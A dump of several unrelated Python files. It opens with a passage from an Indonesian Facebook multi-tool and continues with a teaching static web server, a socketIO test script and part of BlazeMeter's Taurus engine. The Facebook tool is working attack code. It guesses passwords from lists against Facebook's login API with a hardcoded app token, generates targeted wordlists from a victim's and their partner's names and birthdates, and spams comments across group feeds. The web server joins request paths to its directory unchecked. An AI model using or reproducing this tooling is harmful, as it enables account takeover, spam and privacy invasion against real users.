toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mStarting remove status\x1b[1;97m ...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mFailed'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mRemoved'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
friends = json.loads(r.text)
if '[]' in str(friends['data']):
print '\x1b[1;91m[!] No friends request'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in friends['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Failed'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mRemove\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Write Status'
print '║-> \x1b[1;37;40m2. Make Wordlist'
print '║-> \x1b[1;37;40m3. Account Checker'
print '║-> \x1b[1;37;40m4. List Group'
print '║-> \x1b[1;37;40m5. Profile Guard'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
pilih_lain()
def pilih_lain():
other = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mnot found'
pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mWrite status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Can\'t empty'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 52 * '\x1b[1;97m\xe2\x95\x90'
a = raw_input('\x1b[1;91m[+] \x1b[1;92mName Depan \x1b[1;97m: ')
file = open(a + '.txt', 'w')
b = raw_input('\x1b[1;91m[+] \x1b[1;92mName Tengah \x1b[1;97m: ')
c = raw_input('\x1b[1;91m[+] \x1b[1;92mName Belakang \x1b[1;97m: ')
d = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan \x1b[1;97m: ')
e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i = raw_input('\x1b[1;91m[+] \x1b[1;92mName Pacar \x1b[1;97m: ')
j = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan Pacar \x1b[1;97m: ')
k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 52 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mDie\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p['name']
id = p['id']
f = open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 52 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Group \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Enable'
print '║-> \x1b[1;37;40m2. Disable'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
g = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if g == '1':
aktif = 'true'
gaz(toket, aktif)
else:
if g == '2':
non = 'false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDeactivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
|
net09_web_PWB4.py
|
"""PWB4.0 多进程静态web服务器"""
'''
@Time : 2018/1/24 下午3:04
@Author : scrappy_zhang
@File : net09_web_PWB4.py
'''
import socket
import re
import multiprocessing
SERVER_ADDR = (HOST, PORT) = '', 8888 # 服务器地址
VERSION = 4.0 # web服务器版本号
STATIC_PATH = './static/'
class HTTPServer():
def __init__(self, server_address):
"""初始化服务器TCP套接字"""
self.tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.tcp_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.tcp_socket.bind(server_address)
self.tcp_socket.listen(128)
def serve_forever(self):
"""永久运行监听接收连接"""
while True:
client_socket, client_address = self.tcp_socket.accept()
print(client_address, '向服务器发起了请求')
processes = multiprocessing.Process(target=self.handlerequest, args=(client_socket,))
processes.start()
client_socket.close()
def handlerequest(self, client_socket):
"""客户端请求处理,发送响应数据"""
# 收取浏览器请求头,并在服务器端打印显示
request_data = client_socket.recv(2048).decode('utf-8')
request_header_lines = request_data.splitlines()
# print(request_header_lines[0]) # 第一行为请求头信息
# 解析请求头,获取具体请求信息
pattern = r'[^/]+(/[^ ]*)'
request_html_name = re.match(pattern, request_header_lines[0]).group(1)
# 根据解析到的内容补全将要读取文件的路径
if request_html_name == '/':
request_html_name = STATIC_PATH + 'baidu.html'
else:
request_html_name = STATIC_PATH + request_html_name
# 根据文件情况来返回相应的信息
try:
html_file = open(request_html_name, 'rb')
except FileNotFoundError:
# 文件不存在,则返回文件不存在,并返回状态码404
resp_headers = 'HTTP/1.1 404 not found\r\n'
resp_headers += "Server: PWB" + str(VERSION) + '\r\n'
resp_headers += '\r\n'
resp_body = '==== 404 file not found===='.encode('utf-8')
else:
# 文件存在,则读取文件内容,并返回状态码200
resp_headers = "HTTP/1.1 200 OK\r\n" # 200代表响应成功并找到资源
resp_headers += "Server: PWB" + str(VERSION) + '\r\n' # 告诉浏览器服务器
resp_headers += '\r\n' # 空行隔开body
resp_body = html_file.read() # 显示内容为读取的文件内容
html_file.close()
finally:
resp_data = resp_headers.encode('utf-8') + resp_body # 结合响应头和响应体
# 发送相应数据至浏览器
client_socket.send(resp_data)
client_socket.close() # HTTP短连接,请求完即关闭TCP连接
def run():
"""运行服务器"""
pwb = HTTPServer(SERVER_ADDR)
print('web server:PWB %s on port %d...\n' % (VERSION, PORT))
pwb.serve_forever()
if __name__ == '__main__':
run()
|
test-socket.py
|
from threading import Thread
from socketIO_client_nexus import SocketIO, LoggingNamespace
def receive_events_thread():
socketIO.wait()
def shit(*args):
print args
socketIO = SocketIO('http://192.168.43.168', 5001)
camera_namespace = socketIO.define(LoggingNamespace, '/rekathon')
camera_namespace.on('backend', shit)
receive_events_thread = Thread(target=receive_events_thread)
receive_events_thread.daemon = True
receive_events_thread.start()
while True:
camera_namespace.emit('backend', 'a')
|
engine.py
|
"""
Main BZT classes
Copyright 2015 BlazeMeter Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import codecs
import copy
import datetime
import hashlib
import json
import logging
import math
import os
import pkgutil
import re
import shutil
import sys
import threading
import time
import traceback
import uuid
from abc import abstractmethod
from collections import namedtuple, defaultdict
from distutils.version import LooseVersion
from json import encoder
import yaml
from yaml.representer import SafeRepresenter
import bzt
from bzt import ManualShutdown, get_configs_dir, TaurusConfigError, TaurusInternalException, InvalidTaurusConfiguration
from bzt import ToolError
from bzt.requests_model import RequestParser
from bzt.six import numeric_types, string_types, text_type, PY2, UserDict, parse, reraise
from bzt.utils import PIPE, shell_exec, get_full_path, ExceptionalDownloader, get_uniq_name, HTTPClient
from bzt.utils import load_class, to_json, BetterDict, ensure_is_dict, dehumanize_time, is_windows, is_linux
from bzt.utils import str_representer, Environment, RequiredTool
TAURUS_ARTIFACTS_DIR = "TAURUS_ARTIFACTS_DIR"
SETTINGS = "settings"
class Engine(object):
"""
Core entity of the technology, used to coordinate whole process
:type reporters: list[Reporter]
:type services: list[Service]
:type log: logging.Logger
:type aggregator: bzt.modules.aggregator.ConsolidatingAggregator
:type stopping_reason: BaseException
"""
ARTIFACTS_DIR = "%Y-%m-%d_%H-%M-%S.%f"
def __init__(self, parent_logger):
"""
:type parent_logger: logging.Logger
"""
self.file_search_paths = []
self.services = []
self.__artifacts = []
self.reporters = []
self.artifacts_dir = None
self.log = parent_logger.getChild(self.__class__.__name__)
self.env = Environment(self.log) # backward compatibility
self.shared_env = Environment(self.log) # backward compatibility
self.config = Configuration()
self.config.log = self.log.getChild(Configuration.__name__)
self.modules = {} # available modules
self.provisioning = Provisioning()
self.aggregator = Aggregator(is_functional=False)
self.interrupted = False
self.check_interval = 1
self.stopping_reason = None
self.engine_loop_utilization = 0
self.prepared = []
self.started = []
self.default_cwd = None
self.logging_level_down = lambda: None
self.logging_level_up = lambda: None
self._http_client = None
def configure(self, user_configs, read_config_files=True):
"""
Load configuration files
:type user_configs: list[str]
:type read_config_files: bool
"""
self.log.info("Configuring...")
if read_config_files:
self._load_base_configs()
merged_config = self._load_user_configs(user_configs)
all_includes = []
while "included-configs" in self.config:
includes = self.config.pop("included-configs")
included_configs = [self.find_file(conf) for conf in includes if conf not in all_includes + user_configs]
all_includes += includes
self.config.load(included_configs)
self.config['included-configs'] = all_includes
self.config.merge({"version": bzt.VERSION})
self.get_http_client()
if self.config.get(SETTINGS).get("check-updates", True):
install_id = self.config.get("install-id", self._generate_id())
def wrapper():
return self._check_updates(install_id)
thread = threading.Thread(target=wrapper) # intentionally non-daemon thread
thread.start()
return merged_config
def unify_config(self):
executions = self.config.get(ScenarioExecutor.EXEC, [])
if isinstance(executions, dict):
executions = [executions]
self.config[ScenarioExecutor.EXEC] = executions
settings = self.config.get(SETTINGS)
default_executor = settings.get("default-executor", None)
prov_type = self.config.get(Provisioning.PROV)
for execution in executions:
executor = execution.get("executor", default_executor, force_set=True)
if not executor:
msg = "Cannot determine executor type and no default executor in %s"
raise TaurusConfigError(msg % execution)
for param in (ScenarioExecutor.THRPT, ScenarioExecutor.CONCURR):
ensure_is_dict(execution, param, prov_type)
reporting = self.config.get(Reporter.REP, [])
for index in range(len(reporting)):
ensure_is_dict(reporting, index, "module")
services = self.config.get(Service.SERV, [])
for index in range(len(services)):
ensure_is_dict(services, index, "module")
modules = self.config.get("modules")
for module in modules:
ensure_is_dict(modules, module, "class")
@staticmethod
def _generate_id():
if os.getenv("JENKINS_HOME"):
prefix = "jenkins"
elif os.getenv("TRAVIS"):
prefix = "travis"
elif any([key.startswith("bamboo") for key in os.environ.keys()]):
prefix = "bamboo"
elif os.getenv("TEAMCITY_VERSION"):
prefix = "teamcity"
elif os.getenv("DOCKER_HOST"):
prefix = "docker"
elif os.getenv("AWS_"):
prefix = "amazon"
elif os.getenv("GOOGLE_APPLICATION_CREDENTIALS") or os.getenv("CLOUDSDK_CONFIG"):
prefix = "google_cloud"
elif os.getenv("WEBJOBS_NAME"):
prefix = "azure"
elif is_linux():
prefix = 'linux'
elif is_windows():
prefix = 'windows'
else:
prefix = 'macos'
return "%s-%x" % (prefix, uuid.getnode())
def prepare(self):
"""
Prepare engine for work, will call preparing of Provisioning and add
downstream EngineModule instances
"""
self.log.info("Preparing...")
self.unify_config()
interval = self.config.get(SETTINGS).get("check-interval", self.check_interval)
self.check_interval = dehumanize_time(interval)
try:
self.__prepare_aggregator()
self.__prepare_services()
self.__prepare_provisioning()
self.__prepare_reporters()
self.config.dump()
except BaseException as exc:
self.stopping_reason = exc
raise
def _startup(self):
modules = self.services + [self.aggregator] + self.reporters + [self.provisioning] # order matters
for module in modules:
self.log.debug("Startup %s", module)
self.started.append(module)
module.startup()
self.config.dump()
def start_subprocess(self, args, env, cwd=None, **kwargs):
if cwd is None:
cwd = self.default_cwd
return shell_exec(args, cwd=cwd, env=env.get(), **kwargs)
def run(self):
"""
Run the job. Calls `startup`, does periodic `check`,
calls `shutdown` in any case
"""
self.log.info("Starting...")
exc_info = exc_value = None
try:
self._startup()
self.logging_level_down()
self._wait()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
exc_value = exc
exc_info = sys.exc_info()
finally:
self.log.warning("Please wait for graceful shutdown...")
try:
self.logging_level_up()
self._shutdown()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
if exc_value:
reraise(exc_info, exc_value)
def _check_modules_list(self):
stop = False
modules = [self.provisioning, self.aggregator] + self.services + self.reporters # order matters
for module in modules:
if module in self.started:
self.log.debug("Checking %s", module)
finished = bool(module.check())
if finished:
self.log.debug("%s finished", module)
stop = finished
return stop
def _wait(self):
"""
Wait modules for finish
:return:
"""
prev = time.time()
while not self._check_modules_list():
now = time.time()
diff = now - prev
delay = self.check_interval - diff
self.engine_loop_utilization = diff / self.check_interval
self.log.debug("Iteration took %.3f sec, sleeping for %.3f sec...", diff, delay)
if delay > 0:
time.sleep(delay)
prev = time.time()
if self.interrupted:
raise ManualShutdown()
self.config.dump()
def _shutdown(self):
"""
Shutdown modules
:return:
"""
self.log.info("Shutting down...")
self.log.debug("Current stop reason: %s", self.stopping_reason)
exc_info = exc_value = None
modules = [self.provisioning, self.aggregator] + self.reporters + self.services # order matters
for module in modules:
try:
if module in self.started:
module.shutdown()
except BaseException as exc:
self.log.debug("%s:\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
self.config.dump()
if exc_value:
reraise(exc_info, exc_value)
def post_process(self):
"""
Do post-run analysis and processing for the results.
"""
self.log.info("Post-processing...")
# :type exception: BaseException
exc_info = exc_value = None
modules = [self.provisioning, self.aggregator] + self.reporters + self.services # order matters
# services are last because of shellexec which is "final-final" action
for module in modules:
if module in self.prepared:
try:
module.post_process()
except BaseException as exc:
if isinstance(exc, KeyboardInterrupt):
self.log.debug("post_process: %s", exc)
else:
self.log.debug("post_process: %s\n%s", exc, traceback.format_exc())
if not self.stopping_reason:
self.stopping_reason = exc
if not exc_value:
exc_value = exc
exc_info = sys.exc_info()
self.config.dump()
if exc_info:
reraise(exc_info, exc_value)
def create_artifact(self, prefix, suffix):
"""
Create new artifact in artifacts dir with given prefix and suffix
:type prefix: str
:type suffix: str
:return: Path to created file
:rtype: str
:raise TaurusInternalException: if no artifacts dir set
"""
if not self.artifacts_dir:
raise TaurusInternalException("Cannot create artifact: no artifacts_dir set up")
filename = get_uniq_name(self.artifacts_dir, prefix, suffix, self.__artifacts)
self.__artifacts.append(filename)
